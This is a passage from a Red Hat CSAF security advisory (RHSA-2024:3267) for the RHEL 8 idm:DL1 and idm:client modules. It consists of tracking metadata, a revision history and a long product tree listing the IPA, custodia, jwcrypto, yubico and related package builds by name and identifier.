"url": "https://issues.redhat.com/browse/RHEL-28842"
},
{
"category": "external",
"summary": "RHEL-29908",
"url": "https://issues.redhat.com/browse/RHEL-29908"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_3267.json"
}
],
"title": "Red Hat Security Advisory: idm:DL1 and idm:client security update",
"tracking": {
"current_release_date": "2024-11-24T15:46:23+00:00",
"generator": {
"date": "2024-11-24T15:46:23+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:3267",
"initial_release_date": "2024-05-22T11:47:22+00:00",
"revision_history": [
{
"date": "2024-05-22T11:47:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-05-22T11:47:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-24T15:46:23+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "idm:client:8100020240417004735:143e9e98",
"product": {
"name": "idm:client:8100020240417004735:143e9e98",
"product_id": "idm:client:8100020240417004735:143e9e98",
"product_identification_helper": {
"purl": "pkg:rpmmod/redhat/idm@client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"product": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"product_id": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"product": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"product_id": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_id": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "idm:DL1:8100020240416171943:823393f5",
"product": {
"name": "idm:DL1:8100020240416171943:823393f5",
"product_id": "idm:DL1:8100020240416171943:823393f5",
"product_identification_helper": {
"purl": "pkg:rpmmod/redhat/idm@DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_id": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product": {
"name": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_id": "ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck-core@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-python-compat@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-selinux@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-common@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-dns@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaclient@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipalib@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipaserver@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-ipatests@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"product": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"product_id": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-qrcode-core@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"product": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_id": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"product": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"product_id": "ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19692%2Bfac39a03?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"product": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"product_id": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"product": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"product_id": "python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"product": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"product_id": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src"
}
}
},
{
"category": "product_version",
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"product": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"product_id": "pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18920%2B2223d05e?arch=src"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src"
}
}
},
{
"category": "product_version",
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"product_id": "custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/custodia@0.6.0-3.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"product": {
"name": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"product_id": "ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src"
}
}
},
{
"category": "product_version",
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"product": {
"name": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"product_id": "ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-healthcheck@0.12-3.module%2Bel8.9.0%2B19634%2Bc162f948?arch=src"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"product": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"product_id": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-jwcrypto@0.5.0-2.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"product_id": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-kdcproxy@0.4-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"product_id": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-qrcode@5.1-12.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"product_id": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-yubico@1.3.2-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"product_id": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/pyusb@1.0.0-9.1.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=src"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
